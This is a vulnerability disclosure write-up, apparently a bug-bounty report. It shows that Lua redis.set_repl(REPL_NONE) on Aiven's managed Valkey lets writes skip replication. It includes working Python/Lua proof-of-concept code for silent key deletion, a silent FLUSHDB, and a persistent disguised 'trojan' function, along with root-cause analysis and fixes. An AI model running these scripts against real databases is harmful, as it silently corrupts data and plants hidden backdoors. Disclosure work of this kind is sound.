Zion Boggan

In-depth vulnerability research, detection engineering & applied cryptography.

● Open to security-research & detection roles
GitHub · LinkedIn · Email
← Research notebook
DoS / data integrity

Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey

Summary

Any authenticated user on Aiven’s managed Valkey service can use Lua scripting (EVAL) to call redis.set_repl(redis.REPL_NONE), which suppresses replication of subsequent write commands. Writes execute on the master but are never propagated to replicas or the AOF. This allows an attacker to silently corrupt data, delete keys, or flush databases on the master while replicas maintain stale data, creating a split-brain condition that violates Aiven’s replication consistency guarantees.

Additionally, the attacker can use FUNCTION LOAD to register persistent server-side functions that embed redis.set_repl(REPL_NONE) internally. These trojan functions survive across connections and restarts, and silently corrupt data every time any user (including the application itself) calls them. The function code appears benign, the replication suppression is invisible in the function signature.

Redis’s own documentation explicitly warns: “This is an advanced feature. Misuse can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”

Aiven correctly disables replication topology commands (REPLICAOF, SLAVEOF, CLUSTER) and dangerous administrative commands (CONFIG, DEBUG, BGSAVE, ACL), demonstrating clear security intent. However, redis.set_repl() within Lua scripts is completely unrestricted, creating an inconsistency: replication topology is protected, but replication content integrity is not.

Affected Target

  • Service: Aiven for Valkey (Tier 1)
  • Version tested: Valkey 8.1.4
  • Instance: :26161

Severity

P2, Sensitive Data Exposure / Data Integrity Violation

VRT: Server Security Misconfiguration > Database Management System (DBMS) Misconfiguration

CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L, Score: 8.5 (High)

  • AV:N, Network-exploitable over TLS
  • AC:L, Single EVAL command, no preconditions
  • PR:L, Requires basic authentication (default user credentials)
  • UI:N, No user interaction required
  • S:C, Scope changed: attacker’s session creates data inconsistency that affects ALL clients reading from replicas, ALL failover operations, and Aiven’s own backup integrity
  • C:N, No direct data exfiltration
  • I:H, Complete violation of data integrity between master and replicas; silent, undetectable data corruption
  • A:L, Failover produces unexpected data state; intermittent application failures

Impact summary: - Any authenticated user can silently suppress replication of arbitrary write commands - Master and replica data diverge without any error, alert, or audit trail - On Business/Premium plans (2-3 nodes), failover produces unpredictable data state - Persistent trojan functions create permanent, invisible backdoors that corrupt data on every invocation - Violates the fundamental consistency guarantee that Aiven’s multi-node architecture is built on - Redis’s own documentation explicitly warns about this exact misuse scenario

Steps to Reproduce

Prerequisites

  • An Aiven for Valkey instance (any plan)
  • Authentication credentials (default user)
  • Python 3 with redis package (pip install redis)

Attack 1: Silent Key Deletion (master diverges from replicas)

import redis

r = redis.Redis(
 host="<host>", port=26161, username='default', password='<password>',
 ssl=True, ssl_cert_reqs='required',
 ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',
 decode_responses=True, socket_timeout=10
)

# Application sets important data
r.set("user:session:admin", "active_session_token_xyz")

# Attacker silently deletes it - master only, replicas unaffected
r.execute_command('EVAL', '''
 redis.set_repl(redis.REPL_NONE)
 redis.call("DEL", "user:session:admin")
 redis.set_repl(redis.REPL_ALL)
 return "silent delete executed"
''', 0)

# Master: key is GONE
print(r.exists("user:session:admin")) # 0

# Replica still has it → failover "resurrects" deleted data
# Application sees intermittent, impossible-to-diagnose behavior

Actual output on Aiven:

silent delete executed
Key exists on master after silent DEL: 0
--> Key deleted on master but replicas would still have it

Attack 2: Silent FLUSHDB (wipe master, replicas unaffected)

r.execute_command('EVAL', '''
 redis.call("SELECT", "1")
 redis.call("SET", "important_data", "production_config")
 redis.set_repl(redis.REPL_NONE)
 redis.call("FLUSHDB")
 redis.set_repl(redis.REPL_ALL)
 redis.call("SELECT", "0")
 return "FLUSHDB with REPL_NONE executed"
''', 0)

Actual output on Aiven: FLUSHDB with REPL_NONE executed

The entire database is wiped on the master. Replicas retain all data. On failover, data “reappears”, but the master was serving empty responses to all clients during the divergence window.

Attack 3: Persistent Trojan Function (backdoor that survives restarts)

# Load a function that LOOKS innocent but silently corrupts data
lib = '''#!lua name=app_helpers
redis.register_function("cached_get", function(keys, args)
 -- Appears to be a simple cache helper
 -- But silently increments an invisible counter on every call
 redis.set_repl(redis.REPL_NONE)
 redis.call("INCR", "__shadow_ops_count__")
 redis.set_repl(redis.REPL_ALL)
 return redis.call("GET", keys[1])
end)
'''
r.execute_command('FUNCTION', 'LOAD', lib)

# Every time ANY user calls this function, the shadow counter increments
# on the master only. Replicas never see it.
for i in range(5):
 r.execute_command('FCALL', 'cached_get', 1, 'some_key')

counter = r.get("__shadow_ops_count__")
print(f"Shadow counter (master only): {counter}")
# Output: Shadow counter (master only): 5
# Replicas see: 0

# The function persists across restarts via RDB/AOF
# It's registered as "app_helpers.cached_get" - indistinguishable from
# legitimate application functions

Actual output on Aiven:

Trojan function loaded: 'cached_get'
Shadow counter (master only): 5
--> Counter incremented 5 times on master
--> Replicas see counter as 0 (writes were REPL_NONE)
--> This function PERSISTS across restarts via RDB/AOF

Root Cause

1. redis.set_repl() is unrestricted in Lua scripts

The redis.set_repl() function is available to all authenticated users through EVAL. There is no ACL restriction, no command flag, and no configuration option to disable it. Redis’s own documentation describes it as an “advanced feature” that “can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”

2. Inconsistent command restriction policy

Aiven correctly restricts replication and administrative commands:

Command Status Purpose
REPLICAOF / SLAVEOF Disabled Replication topology control
CONFIG Disabled Server configuration
DEBUG Disabled Server debugging
ACL Disabled Access control
BGSAVE / BGREWRITEAOF Disabled Persistence triggers
CLUSTER Disabled Cluster topology
MIGRATE Disabled Data migration
redis.set_repl() in Lua Allowed Replication content control

The policy disables commands that control replication topology (SLAVEOF, CLUSTER) but does not restrict the Lua function that controls replication content (set_repl). This is an inconsistency, both are replication manipulation capabilities.

3. FUNCTION LOAD enables persistent exploitation

The FUNCTION LOAD command is available (confirmed: successfully loaded and executed a function library). Functions persist in the server state and survive restarts via RDB/AOF. A function embedding redis.set_repl(REPL_NONE) creates a permanent backdoor that operates invisibly on every invocation.

Impact on Aiven Multi-Node Plans

Aiven offers three plan tiers with different node counts: - Hobbyist/Startup: 1 node (no replicas, attack creates master/AOF divergence) - Business: 2 nodes (master + 1 replica) - Premium: 3 nodes (master + 2 replicas)

On Business and Premium plans, the replication divergence has direct operational impact:

  1. Silent data loss: Keys deleted with REPL_NONE are gone from the master but exist on replicas. Applications reading from the master see missing data; failover to a replica “resurrects” the data.

  2. Silent data corruption: Keys SET with REPL_NONE have different values on master vs replicas. Read-after-write consistency is violated silently.

  3. Backup poisoning: If REPL_NONE writes land in an RDB backup taken from the master, restoring from that backup produces a state that never existed on replicas.

  4. Impossible diagnosis: There is no error, no log entry, no monitoring alert. The commands execute successfully. Aiven’s internal monitoring (INFO every 5 seconds) does not detect replication content divergence, it only monitors replication lag (bytes behind), not data consistency.

  5. Trojan functions: An attacker can load a persistent function, then disconnect. The function continues operating every time the application calls it. The attack persists indefinitely with no ongoing attacker presence.

Aiven-Specific Nature

This is NOT merely an upstream Valkey/Redis issue. The finding is specific to how Aiven configures and manages their Valkey service:

  1. Aiven’s security model disables dangerous commands, CONFIG, DEBUG, SLAVEOF, etc. are all renamed/disabled. This demonstrates that Aiven actively restricts dangerous capabilities. But redis.set_repl() within Lua was not included in these restrictions.

  2. Aiven sells multi-node plans with replication guarantees, Business and Premium plans explicitly provide high availability through replication. redis.set_repl(REPL_NONE) allows a user to silently violate these guarantees.

  3. Aiven’s documentation implies consistent replication, Customers expect that data written to the master will be available on replicas. This attack violates that expectation without any visible error.

Recommended Fix

  1. Immediate: Restrict redis.set_repl() by either:, Disabling it entirely for client scripts (return an error when called from EVAL/FCALL), Adding an ACL flag (e.g., @admin) that must be explicitly granted, Limiting it to REPL_ALL only (block REPL_NONE, REPL_AOF, REPL_REPLICA)

  2. Defense in depth: Consider restricting FUNCTION LOAD to prevent persistent function registration by default users, or audit loaded functions for set_repl calls.

  3. Detection: Add monitoring for replication content divergence (not just lag). Compare key counts or checksums between master and replicas periodically.

Proof of concept

python3 poc/valkey-restore-crash.py <host> <port> <password>

Source · github.com/zionsworking/security-research-notebook · writeups/aiven/valkey-replication-stealth.md